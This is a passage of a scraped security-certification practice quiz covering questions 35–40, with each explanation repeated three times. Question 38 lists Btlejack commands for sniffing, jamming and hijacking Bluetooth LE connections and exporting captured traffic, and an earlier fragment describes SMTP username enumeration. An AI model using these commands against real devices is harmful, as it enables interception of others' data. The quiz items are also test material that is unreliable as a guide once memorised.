https://info-savvy.com/what-is-enumeration/ SMTP is a service that can be found in most infrastructure penetration tests. This service can help the penetration tester to perform username enumeration via the EXPN and VRFY commands if these commands have not been disabled by the system administrator. The role of the EXPN command is to reveal the actual address of users aliases and lists of email and VRFY which can confirm the existence of names of valid users. The SMTP enumeration can be performed manually through utilities like telnet and netcat or automatically via a variety of tools like metasploit, nmap and smtp-user-enum.
Unattempted
https://info-savvy.com/what-is-enumeration/ SMTP is a service that can be found in most infrastructure penetration tests. This service can help the penetration tester to perform username enumeration via the EXPN and VRFY commands if these commands have not been disabled by the system administrator. The role of the EXPN command is to reveal the actual address of users aliases and lists of email and VRFY which can confirm the existence of names of valid users. The SMTP enumeration can be performed manually through utilities like telnet and netcat or automatically via a variety of tools like metasploit, nmap and smtp-user-enum.
Question 35 of 65
35. Question
Which of the following algorithms is a symmetric key block cipher with a block size of 128 bits representing a 32-round SP-network operating on a block of four 32-bit words?
Correct
https://en.wikipedia.org/wiki/Serpent_(cipher) Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham, and Lars Knudsen. Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitutionpermutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES. Incorrect answers: CAST-128 https://en.wikipedia.org/wiki/CAST-128 CAST-128 is a 12- or 16-round Feistel network with a 64-bit block size and a key size of between 40 and 128 bits RC4 https://en.wikipedia.org/wiki/RC4 RC4 (Rivest Cipher 4 also known as ARC4 or ARCFOUR meaning Alleged RC4, see below) is a stream cipher. SHA-256 https://en.wikipedia.org/wiki/SHA-2 SHA-2 (Secure Hash Algorithm 2) is a set of cryptographic hash functions designed by the United States National Security Agency (NSA) and first published in 2001. The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256.
Incorrect
https://en.wikipedia.org/wiki/Serpent_(cipher) Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham, and Lars Knudsen. Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitutionpermutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES. Incorrect answers: CAST-128 https://en.wikipedia.org/wiki/CAST-128 CAST-128 is a 12- or 16-round Feistel network with a 64-bit block size and a key size of between 40 and 128 bits RC4 https://en.wikipedia.org/wiki/RC4 RC4 (Rivest Cipher 4 also known as ARC4 or ARCFOUR meaning Alleged RC4, see below) is a stream cipher. SHA-256 https://en.wikipedia.org/wiki/SHA-2 SHA-2 (Secure Hash Algorithm 2) is a set of cryptographic hash functions designed by the United States National Security Agency (NSA) and first published in 2001. The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256.
Unattempted
https://en.wikipedia.org/wiki/Serpent_(cipher) Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham, and Lars Knudsen. Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitutionpermutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES. Incorrect answers: CAST-128 https://en.wikipedia.org/wiki/CAST-128 CAST-128 is a 12- or 16-round Feistel network with a 64-bit block size and a key size of between 40 and 128 bits RC4 https://en.wikipedia.org/wiki/RC4 RC4 (Rivest Cipher 4 also known as ARC4 or ARCFOUR meaning Alleged RC4, see below) is a stream cipher. SHA-256 https://en.wikipedia.org/wiki/SHA-2 SHA-2 (Secure Hash Algorithm 2) is a set of cryptographic hash functions designed by the United States National Security Agency (NSA) and first published in 2001. The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256.
Question 36 of 65
36. Question
Which of the following is an example of a scareware social engineering attack?
Correct
https://en.wikipedia.org/wiki/Scareware It‘s a very simple question, but nevertheless, you may meet a similar one on the exam, so you just have to be ready for it. Scareware refers to scam tactics and fake software applications that cybercriminals use to incite feelings of panic and fear. They do this to get users to make irrational split-second decisions and to trick them into: – Buying worthless software; – Downloading different types of malicious software; – Visiting websites that auto-download and install malicious software onto their devices. Scareware scammers use social engineering tactics and language that create a sense of urgency in their targets to compel their targets to act. They frequently rely on pop-ups that are designed to look like antivirus alerts. In some cases, the messages can take over part (or all) of the targets screen. In general, scareware messages are associated with fake antivirus software and tech support scams. They falsely notify people that their devices (such as their computer, tablet, mobile phone) are infected with various types of malware.
Incorrect
https://en.wikipedia.org/wiki/Scareware It‘s a very simple question, but nevertheless, you may meet a similar one on the exam, so you just have to be ready for it. Scareware refers to scam tactics and fake software applications that cybercriminals use to incite feelings of panic and fear. They do this to get users to make irrational split-second decisions and to trick them into: – Buying worthless software; – Downloading different types of malicious software; – Visiting websites that auto-download and install malicious software onto their devices. Scareware scammers use social engineering tactics and language that create a sense of urgency in their targets to compel their targets to act. They frequently rely on pop-ups that are designed to look like antivirus alerts. In some cases, the messages can take over part (or all) of the targets screen. In general, scareware messages are associated with fake antivirus software and tech support scams. They falsely notify people that their devices (such as their computer, tablet, mobile phone) are infected with various types of malware.
Unattempted
https://en.wikipedia.org/wiki/Scareware It‘s a very simple question, but nevertheless, you may meet a similar one on the exam, so you just have to be ready for it. Scareware refers to scam tactics and fake software applications that cybercriminals use to incite feelings of panic and fear. They do this to get users to make irrational split-second decisions and to trick them into: – Buying worthless software; – Downloading different types of malicious software; – Visiting websites that auto-download and install malicious software onto their devices. Scareware scammers use social engineering tactics and language that create a sense of urgency in their targets to compel their targets to act. They frequently rely on pop-ups that are designed to look like antivirus alerts. In some cases, the messages can take over part (or all) of the targets screen. In general, scareware messages are associated with fake antivirus software and tech support scams. They falsely notify people that their devices (such as their computer, tablet, mobile phone) are infected with various types of malware.
Question 37 of 65
37. Question
You need to increase the security of keys used for encryption and authentication. For these purposes, you decide to use a technique to enter an initial key to an algorithm that generates an enhanced key resistant to brute-force attacks. Which of the following techniques will you use?
Correct
https://en.wikipedia.org/wiki/Key_stretching Key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking, and key stretching is intended to make such attacks more difficult by complicating a basic step of trying a single password candidate. Key stretching also improves security in some real-world applications where the key length has been constrained, by mimicking a longer key length from the perspective of a brute-force attacker. There are several ways to perform key stretching. One way is to apply a cryptographic hash function or a block cipher repeatedly in a loop. For example, in applications where the key is used for a cipher, the key schedule in the cipher may be modified so that it takes a specific length of time to perform. Another way is to use cryptographic hash functions that have large memory requirements these can be effective in frustrating attacks by memory-bound adversaries. Key stretching algorithms depend on an algorithm that receives an input key and then expends considerable effort to generate a stretched cipher (called an enhanced key[citation needed]) mimicking randomness and longer key length. The algorithm must have no known shortcut, so the most efficient way to relate the input and cipher is to repeat the key stretching algorithm itself. This compels brute-force attackers to expend the same effort for each attempt. If this added effort compares to a brute-force key search of all keys with a certain key length, then the input key may be described as stretched by that same length. Key stretching leaves an attacker with two options: – Attempt possible combinations of the enhanced key, but this is infeasible if the enhanced key is sufficiently long and unpredictable (??i.e.,?the algorithm mimics randomness well enough that the attacker must trial the entire stretched key space). – Attempt possible combinations of the weaker initial key, potentially commencing with a dictionary attack if the initial key is a password or passphrase, but the attacker‘s added effort for each trial could render the attack uneconomic should the costlier computation and memory consumption outweigh the expected profit. If the attacker uses the same class of hardware as the user, each guess will take the similar amount of time to process as it took the user (for example, one second). Even if the attacker has much greater computing resources than the user, the key stretching will still slow the attacker down while not seriously affecting the usability of the system for any legitimate user. This is because the user‘s computer only has to compute the stretching function once upon the user entering their password, whereas the attacker must compute it for every guess in the attack. This process does not alter the original key-space entropy. The key stretching algorithm is deterministic, allowing a weak input to always generate the same enhanced key, but therefore limiting the enhanced key to no more possible combinations than the input key space. Consequently, this attack remains vulnerable if unprotected against certain time-memory tradeoffs such as developing rainbow tables to target multiple instances of the enhanced key space in parallel (effectively a shortcut to repeating the algorithm). For this reason, key stretching is often combined with salting. Incorrect answers: KDF https://en.wikipedia.org/wiki/Key_derivation_function Key derivation function (KDF) is a cryptographic hash function that derives one or more secret keys from a secret value such as the main key, a password, or a passphrase using a pseudorandom function. KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a DiffieHellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation. PKI https://en.wikipedia.org/wiki/Public_key_infrastructure A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred. In cryptography, a PKI is an arrangement that binds public keys with respective identities of entities (like people and organizations). The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP. Key reinstallation https://en.wikipedia.org/wiki/KRACK KRACK (“Key Reinstallation Attack“) is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef‘s research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data.
Incorrect
https://en.wikipedia.org/wiki/Key_stretching Key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking, and key stretching is intended to make such attacks more difficult by complicating a basic step of trying a single password candidate. Key stretching also improves security in some real-world applications where the key length has been constrained, by mimicking a longer key length from the perspective of a brute-force attacker. There are several ways to perform key stretching. One way is to apply a cryptographic hash function or a block cipher repeatedly in a loop. For example, in applications where the key is used for a cipher, the key schedule in the cipher may be modified so that it takes a specific length of time to perform. Another way is to use cryptographic hash functions that have large memory requirements these can be effective in frustrating attacks by memory-bound adversaries. Key stretching algorithms depend on an algorithm that receives an input key and then expends considerable effort to generate a stretched cipher (called an enhanced key[citation needed]) mimicking randomness and longer key length. The algorithm must have no known shortcut, so the most efficient way to relate the input and cipher is to repeat the key stretching algorithm itself. This compels brute-force attackers to expend the same effort for each attempt. If this added effort compares to a brute-force key search of all keys with a certain key length, then the input key may be described as stretched by that same length. Key stretching leaves an attacker with two options: – Attempt possible combinations of the enhanced key, but this is infeasible if the enhanced key is sufficiently long and unpredictable (??i.e.,?the algorithm mimics randomness well enough that the attacker must trial the entire stretched key space). – Attempt possible combinations of the weaker initial key, potentially commencing with a dictionary attack if the initial key is a password or passphrase, but the attacker‘s added effort for each trial could render the attack uneconomic should the costlier computation and memory consumption outweigh the expected profit. If the attacker uses the same class of hardware as the user, each guess will take the similar amount of time to process as it took the user (for example, one second). Even if the attacker has much greater computing resources than the user, the key stretching will still slow the attacker down while not seriously affecting the usability of the system for any legitimate user. This is because the user‘s computer only has to compute the stretching function once upon the user entering their password, whereas the attacker must compute it for every guess in the attack. This process does not alter the original key-space entropy. The key stretching algorithm is deterministic, allowing a weak input to always generate the same enhanced key, but therefore limiting the enhanced key to no more possible combinations than the input key space. Consequently, this attack remains vulnerable if unprotected against certain time-memory tradeoffs such as developing rainbow tables to target multiple instances of the enhanced key space in parallel (effectively a shortcut to repeating the algorithm). For this reason, key stretching is often combined with salting. Incorrect answers: KDF https://en.wikipedia.org/wiki/Key_derivation_function Key derivation function (KDF) is a cryptographic hash function that derives one or more secret keys from a secret value such as the main key, a password, or a passphrase using a pseudorandom function. KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a DiffieHellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation. PKI https://en.wikipedia.org/wiki/Public_key_infrastructure A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred. In cryptography, a PKI is an arrangement that binds public keys with respective identities of entities (like people and organizations). The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP. Key reinstallation https://en.wikipedia.org/wiki/KRACK KRACK (“Key Reinstallation Attack“) is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef‘s research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data.
Unattempted
https://en.wikipedia.org/wiki/Key_stretching Key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking, and key stretching is intended to make such attacks more difficult by complicating a basic step of trying a single password candidate. Key stretching also improves security in some real-world applications where the key length has been constrained, by mimicking a longer key length from the perspective of a brute-force attacker. There are several ways to perform key stretching. One way is to apply a cryptographic hash function or a block cipher repeatedly in a loop. For example, in applications where the key is used for a cipher, the key schedule in the cipher may be modified so that it takes a specific length of time to perform. Another way is to use cryptographic hash functions that have large memory requirements these can be effective in frustrating attacks by memory-bound adversaries. Key stretching algorithms depend on an algorithm that receives an input key and then expends considerable effort to generate a stretched cipher (called an enhanced key[citation needed]) mimicking randomness and longer key length. The algorithm must have no known shortcut, so the most efficient way to relate the input and cipher is to repeat the key stretching algorithm itself. This compels brute-force attackers to expend the same effort for each attempt. If this added effort compares to a brute-force key search of all keys with a certain key length, then the input key may be described as stretched by that same length. Key stretching leaves an attacker with two options: – Attempt possible combinations of the enhanced key, but this is infeasible if the enhanced key is sufficiently long and unpredictable (??i.e.,?the algorithm mimics randomness well enough that the attacker must trial the entire stretched key space). – Attempt possible combinations of the weaker initial key, potentially commencing with a dictionary attack if the initial key is a password or passphrase, but the attacker‘s added effort for each trial could render the attack uneconomic should the costlier computation and memory consumption outweigh the expected profit. If the attacker uses the same class of hardware as the user, each guess will take the similar amount of time to process as it took the user (for example, one second). Even if the attacker has much greater computing resources than the user, the key stretching will still slow the attacker down while not seriously affecting the usability of the system for any legitimate user. This is because the user‘s computer only has to compute the stretching function once upon the user entering their password, whereas the attacker must compute it for every guess in the attack. This process does not alter the original key-space entropy. The key stretching algorithm is deterministic, allowing a weak input to always generate the same enhanced key, but therefore limiting the enhanced key to no more possible combinations than the input key space. Consequently, this attack remains vulnerable if unprotected against certain time-memory tradeoffs such as developing rainbow tables to target multiple instances of the enhanced key space in parallel (effectively a shortcut to repeating the algorithm). For this reason, key stretching is often combined with salting. Incorrect answers: KDF https://en.wikipedia.org/wiki/Key_derivation_function Key derivation function (KDF) is a cryptographic hash function that derives one or more secret keys from a secret value such as the main key, a password, or a passphrase using a pseudorandom function. KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a DiffieHellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation. PKI https://en.wikipedia.org/wiki/Public_key_infrastructure A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred. In cryptography, a PKI is an arrangement that binds public keys with respective identities of entities (like people and organizations). The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP. Key reinstallation https://en.wikipedia.org/wiki/KRACK KRACK (“Key Reinstallation Attack“) is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef‘s research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data.
Question 38 of 65
38. Question
The attacker performs the attack using micro:bit and Btlejack, gradually executed different commands in the console. After executing this attack, he was able to read and export sensitive information shared between connected devices. Which of the following commands did the attacker use to hijack the connections?
Correct
https://github.com/virtualabs/btlejack This question looks a bit strange and abstract. Nevertheless, you will meet a question on a similar topic on the exam. To answer, you just need to look at the example of Btlejacking Using BtleJack presented in EC-Council‘s courseware. Btlejacking is performed using the following steps. 1. Select target devices using the following command: btlejack -d /dev/ttyACMO -d /dev/ttyACM2 -s 2. With the Btlejack tool, take a position within a radius of 5 m from the target devices. 3. Capture already established (live) as well as new Bluetooth low energy (BLE) connections using the following commands. – Sniffing an existing connection: btlejack -s – Sniffing for new connections: btlejack -c any 4. Once the connection is captured, perform a jamming operation using the following command: btlejack -f 0x129f3244 -j 5. Start hijacking the connection using the following command: btlejack -f 0x9c68fd30 -t -m 0xlfffffffff 6. The captured data can be converted into the pcap format using the following command: btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap
Incorrect
https://github.com/virtualabs/btlejack This question looks a bit strange and abstract. Nevertheless, you will meet a question on a similar topic on the exam. To answer, you just need to look at the example of Btlejacking Using BtleJack presented in EC-Council‘s courseware. Btlejacking is performed using the following steps. 1. Select target devices using the following command: btlejack -d /dev/ttyACMO -d /dev/ttyACM2 -s 2. With the Btlejack tool, take a position within a radius of 5 m from the target devices. 3. Capture already established (live) as well as new Bluetooth low energy (BLE) connections using the following commands. – Sniffing an existing connection: btlejack -s – Sniffing for new connections: btlejack -c any 4. Once the connection is captured, perform a jamming operation using the following command: btlejack -f 0x129f3244 -j 5. Start hijacking the connection using the following command: btlejack -f 0x9c68fd30 -t -m 0xlfffffffff 6. The captured data can be converted into the pcap format using the following command: btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap
Unattempted
https://github.com/virtualabs/btlejack This question looks a bit strange and abstract. Nevertheless, you will meet a question on a similar topic on the exam. To answer, you just need to look at the example of Btlejacking Using BtleJack presented in EC-Council‘s courseware. Btlejacking is performed using the following steps. 1. Select target devices using the following command: btlejack -d /dev/ttyACMO -d /dev/ttyACM2 -s 2. With the Btlejack tool, take a position within a radius of 5 m from the target devices. 3. Capture already established (live) as well as new Bluetooth low energy (BLE) connections using the following commands. – Sniffing an existing connection: btlejack -s – Sniffing for new connections: btlejack -c any 4. Once the connection is captured, perform a jamming operation using the following command: btlejack -f 0x129f3244 -j 5. Start hijacking the connection using the following command: btlejack -f 0x9c68fd30 -t -m 0xlfffffffff 6. The captured data can be converted into the pcap format using the following command: btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap
Question 39 of 65
39. Question
Rajesh wants to make the Internet a little safer and uses his skills to scan the networks of various organizations and find vulnerabilities even without the owners‘ permission. He informs the company owner about the problems encountered, but if the company ignores him and does not fix the vulnerabilities, Rajesh publishes them publicly and forces the company to respond. What type of hacker is best suited for Rajesh?
Correct
https://www.kaspersky.com/resource-center/definitions/hacker-hat-types Grey hat hackers are a blend of both black hat and white hat activities. Often, grey hat hackers will look for vulnerabilities in a system without the owners permission or knowledge. If issues are found, they will report them to the owner, sometimes requesting a small fee to fix the problem. If the owner does not respond or comply, periodically, the hackers will post the newly found exploit online for the world to see. These types of hackers are not inherently malicious with their intentions; theyre just looking to get something out of their discoveries for themselves. Usually, grey hat hackers will not exploit the found vulnerabilities. However, this type of hacking is still considered illegal because the hacker did not receive permission from the owner before attacking the system.
Incorrect
https://www.kaspersky.com/resource-center/definitions/hacker-hat-types Grey hat hackers are a blend of both black hat and white hat activities. Often, grey hat hackers will look for vulnerabilities in a system without the owners permission or knowledge. If issues are found, they will report them to the owner, sometimes requesting a small fee to fix the problem. If the owner does not respond or comply, periodically, the hackers will post the newly found exploit online for the world to see. These types of hackers are not inherently malicious with their intentions; theyre just looking to get something out of their discoveries for themselves. Usually, grey hat hackers will not exploit the found vulnerabilities. However, this type of hacking is still considered illegal because the hacker did not receive permission from the owner before attacking the system.
Unattempted
https://www.kaspersky.com/resource-center/definitions/hacker-hat-types Grey hat hackers are a blend of both black hat and white hat activities. Often, grey hat hackers will look for vulnerabilities in a system without the owners permission or knowledge. If issues are found, they will report them to the owner, sometimes requesting a small fee to fix the problem. If the owner does not respond or comply, periodically, the hackers will post the newly found exploit online for the world to see. These types of hackers are not inherently malicious with their intentions; theyre just looking to get something out of their discoveries for themselves. Usually, grey hat hackers will not exploit the found vulnerabilities. However, this type of hacking is still considered illegal because the hacker did not receive permission from the owner before attacking the system.
Question 40 of 65
40. Question
Which of the following standards is most applicable for a major credit card company?
Correct
https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard The Payment Card Industry Data Security Standard (PCI DSS) is an information security standard for organizations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands but administered by the Payment Card Industry Security Standards Council. The standard was created to increase controls around cardholder data to reduce credit card fraud. Validation of compliance is performed annually or quarterly better source needed] by a method suited to the volume of transactions handled: Self-Assessment Questionnaire (SAQ) smaller volumes; External Qualified Security Assessor (QSA) moderate volumes; involves an Attestation on Compliance (AOC); Firm-specific Internal Security Assessor (ISA) larger volumes; involves issuing a Report on Compliance (ROC). Incorrect answers: FISMA https://en.wikipedia.org/wiki/Federal_Information_Security_Management_Act_of_2002 The Federal Information Security Management Act of 2002 (FISMA, 44 U.S.C. § 3541, et seq.) is a United States federal law enacted in 2002 as Title III of the E-Government Act of 2002 (Pub.L. 107347 (text) (pdf), 116 Stat. 2899). The act recognized the importance of information security to the economic and national security interests of the United States. The act requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source. FISMA has brought attention within the federal government to cybersecurity and explicitly emphasized a “risk-based policy for cost-effective security.“ FISMA requires agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency‘s information security program and report the results to Office of Management and Budget (OMB). OMB uses this data to assist in its oversight responsibilities and to prepare this annual report to Congress on agency compliance with the act. In FY 2008, federal agencies spent $6.2 billion securing the government‘s total information technology investment of approximately $68 billion or about 9.2 percent of the total information technology portfolio. Sarbanes-Oxley Act https://en.wikipedia.org/wiki/Sarbanes%E2%80%93Oxley_Act The SarbanesOxley Act of 2002 is a United States federal law that mandates certain practices in financial record keeping and reporting for corporations. The act, (Pub.L. 107204 (text) (pdf), 116 Stat. 745, enacted July 30, 2002), also known as the “Public Company Accounting Reform and Investor Protection Act“ (in the Senate) and “Corporate and Auditing Accountability, Responsibility, and Transparency Act“ (in the House) and more commonly called SarbanesOxley or SOX, contains eleven sections that place requirements on all U.S. public company boards of directors and management and public accounting firms. A number of provisions of the Act also apply to privately held companies, such as the willful destruction of evidence to impede a federal investigation. The law was enacted as a reaction to a number of major corporate and accounting scandals, including Enron and WorldCom. The sections of the bill cover responsibilities of a public corporation‘s board of directors, add criminal penalties for certain misconduct, and require the Securities and Exchange Commission to create regulations to define how public corporations are to comply with the law. HIPAA https://en.wikipedia.org/wiki/Health_Insurance_Portability_and_Accountability_Act The Health Insurance Portability and Accountability Act of 1996 (HIPAA or the KennedyKassebaum Act) is a United States federal statute enacted by the 104th United States Congress and signed into law by President Bill Clinton on August 21, 1996. It modernized the flow of healthcare information, stipulates how personally identifiable information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and addressed some limitations on healthcare insurance coverage. It generally prohibits healthcare providers and healthcare businesses, called covered entities, from disclosing private information to anyone other than a patient and the patient‘s authorized representatives. It does not restrict patients from receiving information about themselves, prohibit them from voluntarily sharing their private health information however they choose, or if they disclose private medical information to family members, friends, or other private individuals legally require those non-covered people to maintain confidentiality.
Incorrect
https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard The Payment Card Industry Data Security Standard (PCI DSS) is an information security standard for organizations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands but administered by the Payment Card Industry Security Standards Council. The standard was created to increase controls around cardholder data to reduce credit card fraud. Validation of compliance is performed annually or quarterly better source needed] by a method suited to the volume of transactions handled: Self-Assessment Questionnaire (SAQ) smaller volumes; External Qualified Security Assessor (QSA) moderate volumes; involves an Attestation on Compliance (AOC); Firm-specific Internal Security Assessor (ISA) larger volumes; involves issuing a Report on Compliance (ROC). Incorrect answers: FISMA https://en.wikipedia.org/wiki/Federal_Information_Security_Management_Act_of_2002 The Federal Information Security Management Act of 2002 (FISMA, 44 U.S.C. § 3541, et seq.) is a United States federal law enacted in 2002 as Title III of the E-Government Act of 2002 (Pub.L. 107347 (text) (pdf), 116 Stat. 2899). The act recognized the importance of information security to the economic and national security interests of the United States. The act requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source. FISMA has brought attention within the federal government to cybersecurity and explicitly emphasized a “risk-based policy for cost-effective security.“ FISMA requires agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency‘s information security program and report the results to Office of Management and Budget (OMB). OMB uses this data to assist in its oversight responsibilities and to prepare this annual report to Congress on agency compliance with the act. In FY 2008, federal agencies spent $6.2 billion securing the government‘s total information technology investment of approximately $68 billion or about 9.2 percent of the total information technology portfolio. Sarbanes-Oxley Act https://en.wikipedia.org/wiki/Sarbanes%E2%80%93Oxley_Act The SarbanesOxley Act of 2002 is a United States federal law that mandates certain practices in financial record keeping and reporting for corporations. The act, (Pub.L. 107204 (text) (pdf), 116 Stat. 745, enacted July 30, 2002), also known as the “Public Company Accounting Reform and Investor Protection Act“ (in the Senate) and “Corporate and Auditing Accountability, Responsibility, and Transparency Act“ (in the House) and more commonly called SarbanesOxley or SOX, contains eleven sections that place requirements on all U.S. public company boards of directors and management and public accounting firms. A number of provisions of the Act also apply to privately held companies, such as the willful destruction of evidence to impede a federal investigation. The law was enacted as a reaction to a number of major corporate and accounting scandals, including Enron and WorldCom. The sections of the bill cover responsibilities of a public corporation‘s board of directors, add criminal penalties for certain misconduct, and require the Securities and Exchange Commission to create regulations to define how public corporations are to comply with the law. HIPAA https://en.wikipedia.org/wiki/Health_Insurance_Portability_and_Accountability_Act The Health Insurance Portability and Accountability Act of 1996 (HIPAA or the KennedyKassebaum Act) is a United States federal statute enacted by the 104th United States Congress and signed into law by President Bill Clinton on August 21, 1996. It modernized the flow of healthcare information, stipulates how personally identifiable information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and addressed some limitations on healthcare insurance coverage. It generally prohibits healthcare providers and healthcare businesses, called covered entities, from disclosing private information to anyone other than a patient and the patient‘s authorized representatives. It does not restrict patients from receiving information about themselves, prohibit them from voluntarily sharing their private health information however they choose, or if they disclose private medical information to family members, friends, or other private individuals legally require those non-covered people to maintain confidentiality.
Unattempted
